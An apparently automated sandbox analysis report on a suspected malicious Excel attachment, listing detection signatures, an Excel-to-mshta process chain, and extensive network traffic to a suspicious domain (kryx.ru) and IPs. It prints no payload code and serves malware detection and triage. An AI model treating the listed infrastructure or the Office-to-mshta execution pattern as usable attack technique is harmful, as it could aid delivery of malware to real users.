Joe Sandbox Cloud Basic Analysis Report
Create Interactive Tour

Windows Analysis Report
PO#4500550389.xla.xlsx

Overview

General Information

Sample name:PO#4500550389.xla.xlsx
Analysis ID:1640393
MD5:f871e42b797cf70e3ee4a79e21f02197
SHA1:b03ebab29eab8c27f1a814494953147a9b90322f
SHA256:ecc360802ade998b33380472d1b5ce4dc95e4039daf93123ba3885e2716dc012
Tags:xlaxlsxuser-abuse_ch
Infos:

Detection

Score:60
Range:0 - 100
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Sigma detected: Suspicious Microsoft Office Child Process
Detected non-DNS traffic on DNS port
Document contains embedded VBA macros
Document embeds suspicious OLE2 link
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Sample execution stops while process was sleeping (likely an evasion)
Searches for the Microsoft Outlook file path
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Suricata IDS alerts with low severity for network traffic
Unable to load, office file is protected or invalid
Uses a known web browser user agent for HTTP communication

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

Process Tree

  • System is w10x64
  • EXCEL.EXE (PID: 6968 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding MD5: 4A871771235598812032C822E6F68F19)
    • mshta.exe (PID: 7932 cmdline: C:\Windows\SysWOW64\mshta.exe -Embedding MD5: 06B02D5C097C7DB1F109749C45F3F505)
    • splwow64.exe (PID: 8048 cmdline: C:\Windows\splwow64.exe 12288 MD5: 77DE7761B037061C7C112FD3C5B91E73)
  • EXCEL.EXE (PID: 5376 cmdline: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\user\Desktop\PO#4500550389.xla.xlsx" MD5: 4A871771235598812032C822E6F68F19)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

No yara matches

Sigma Signatures

System Summary

barindex
Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, CommandLine|base64offset|contains: Iyb, Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, ParentProcessId: 6968, ParentProcessName: EXCEL.EXE, ProcessCommandLine: C:\Windows\SysWOW64\mshta.exe -Embedding, ProcessId: 7932, ProcessName: mshta.exe
Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DesusertionIp: 188.225.72.170, DesusertionIsIpv6: false, DesusertionPort: 443, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6968, Protocol: tcp, SourceIp: 192.168.2.9, SourceIsIpv6: false, SourcePort: 58538
Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DesusertionIp: 192.168.2.9, DesusertionIsIpv6: false, DesusertionPort: 58538, EventID: 3, Image: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, Initiated: true, ProcessId: 6968, Protocol: tcp, SourceIp: 188.225.72.170, SourceIsIpv6: false, SourcePort: 443

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-03-17T09:43:18.559061+010020283713Unknown Traffic192.168.2.95854213.107.253.72443TCP
2025-03-17T09:43:24.796444+010020283713Unknown Traffic192.168.2.95854413.107.253.72443TCP
2025-03-17T09:43:24.811495+010020283713Unknown Traffic192.168.2.95854313.107.253.72443TCP

Joe Sandbox Signatures

  • AV Detection
  • Compliance
  • Software Vulnerabilities
  • Networking
  • System Summary
  • Hooking and other Techniques for Hiding and Protection
  • Malware Analysis System Evasion

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: PO#4500550389.xla.xlsxVirustotal: Detection: 33%Perma Link
Source: PO#4500550389.xla.xlsxReversingLabs: Detection: 19%
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
Source: unknownHTTPS traffic detected: 188.225.72.170:443 -> 192.168.2.9:58538 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.253.72:443 -> 192.168.2.9:58542 version: TLS 1.2

Software Vulnerabilities

barindex
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\mshta.exe
Source: global trafficDNS query: name: kryx.ru
Source: global trafficDNS query: name: otelrules.svc.static.microsoft
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58539 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58544 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58543 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58531 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.9:58531
Source: global trafficTCP traffic: 192.168.2.9:58531 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.9:58531
Source: global trafficTCP traffic: 192.168.2.9:58531 -> 1.1.1.1:53
Source: global trafficTCP traffic: 1.1.1.1:53 -> 192.168.2.9:58531
Source: global trafficTCP traffic: 192.168.2.9:58531 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 192.168.2.9:58538 -> 188.225.72.170:443
Source: global trafficTCP traffic: 188.225.72.170:443 -> 192.168.2.9:58538
Source: global trafficTCP traffic: 192.168.2.9:58539 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.9:58539
Source: global trafficTCP traffic: 192.168.2.9:58539 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.9:58539 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.9:58539
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.9:58539
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.9:58539
Source: global trafficTCP traffic: 192.168.2.9:58539 -> 198.12.89.24:80
Source: global trafficTCP traffic: 198.12.89.24:80 -> 192.168.2.9:58539
Source: global trafficTCP traffic: 192.168.2.9:58539 -> 198.12.89.24:80
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
Source: global trafficTCP traffic: 192.168.2.9:58542 -> 13.107.253.72:443
Source: global trafficTCP traffic: 13.107.253.72:443 -> 192.168.2.9:58542
